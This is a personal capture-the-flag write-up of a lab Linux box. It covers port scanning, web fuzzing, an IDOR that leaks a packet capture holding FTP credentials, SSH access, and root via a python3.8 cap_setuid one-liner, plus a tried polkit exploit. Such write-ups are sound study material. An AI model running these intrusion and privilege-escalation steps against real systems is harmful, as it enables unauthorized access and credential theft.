# Lessons Learned - If something looks like an IDOR or file upload vuln, it probably is - don't sleep on your gut even if the index if a 1 - try 0 - `linpeas` did not show dangerous capabilities on services, but I may have missed itthe `linpeas` output - maybe we should be downloading the latest version of tools before running for this reason - i only manually ran a capabilities check because of the name of the box --- # After-Action Attack Sequence - BLUF: xxx - xxx --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260709191920.png]] - `nmap` scan - light ![[images/Pasted image 20260709191928.png]] - `nmap` scan - detailed ![[images/Pasted image 20260709193238.png]] - Google `gunicorn` ![[images/Pasted image 20260709193334.png]] --- # Service Enum ## Port 21 (ftp): vftpd 3.0.3 - check version - just a DoS ![[images/Pasted image 20260709192108.png]] - no anonymous login ![[images/Pasted image 20260709192238.png]] - try again with creds for Nathan ```bash wget -m --no-passive ftp://[email protected] ``` - we are able to grab his home dir ![[images/Pasted image 20260709202310.png]] - but ftp looks like a dead end, let's proceed to ssh ## Port 80 (http): service_name ver. xxx # Initial checks - visit page > we have access to some kind of security dashboard ![[images/Pasted image 20260709192417.png]] - We have some interesting functionality - `/ip` shows `ifconfig` - `/netstat` shows output of `netstat` - `/capture` does a pcap for 5sec and analyzes on `/data/1` - seems to iterate - perform a search > here we have a parameter to play with ![[images/Pasted image 20260709193927.png]] - nothing at `robots.txt` or `sitemap.xml` - `index.php` and `index.html` throw 404s - rando page throws a 404 ![[images/Pasted image 20260709193536.png]] - `whatweb` check ![[images/Pasted image 20260709193426.png]] - `nuclei` check ![[images/Pasted image 20260709194212.png]] - acceptable methods ![[images/Pasted image 20260709200411.png]] - other pages ![[images/Pasted image 20260709200549.png]]![[images/Pasted image 20260709200611.png]] ## Fuzzing - directory ```bash ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.129.25.240/FUZZ -c -ic -mc all -fs 232 ``` ![[images/Pasted image 20260709195053.png]] - parameter fuzzing - not working even though i confirmed this wordlist incldues "search" ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.129.25.240/?FUZZ= -c -ic -mc all ``` ![[images/Pasted image 20260709195302.png]] ## SQLi test on `/?search=test` ```bash sqlmap -r search-param.req --batch --level 3 risk 5 ``` ![[images/Pasted image 20260709195900.png]] ## LFi test on `/?search=FUZZ` ```bash ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://10.129.24.240/?search=FUZZ -c -ic -mc all ``` ![[images/Pasted image 20260709200633.png]] - very interesting that i can also search from `/ip?search=` or `/netstat?search=` ## IDOR - check `/data/0` since our first attempt was `/data/0` - we are able to download someone else's pcap file ![[images/Pasted image 20260709202407.png]] - when we open in `wireshark` we see creds for nathan directed to the ftp server ![[images/Pasted image 20260709202354.png]] --- # Foothold > Port 22 (ssh) - we are on the box as `nathan` ![[images/Pasted image 20260709202524.png]] - open ports ![[images/Pasted image 20260709202639.png]] - check processes - not much > only `nathan` ![[images/Pasted image 20260709202722.png]] - check `/etc/fstab` for `hidepid=2` ![[images/Pasted image 20260709202738.png]] - confirmed on `/dev/sda4` - `nathan` is only home dir ![[images/Pasted image 20260709202850.png]] - move `linpeas.sh` to target ![[images/Pasted image 20260709203125.png]] - guessing the privesc is `getcap` related - run `linpeas` - vulnerable to polkit? ![[images/Pasted image 20260709203539.png]] - check capabilities ```bash find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; ``` ![[images/Pasted image 20260709205005.png]] - the `cap_setuid` ability for `python3.8` is non-default and very juicy --- # Privesc ## Abuse `python2.8` capabilities - Googling indicates we just need to run the below ```bash /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")' ``` - that was fast ![[images/Pasted image 20260709205235.png]] ## Exploit CVE-2021-3560 - Move `traitor-amd64` to target![[images/Pasted image 20260709205355.png]] - make executable and run ![[images/Pasted image 20260709205606.png]] - interesting > okay not the path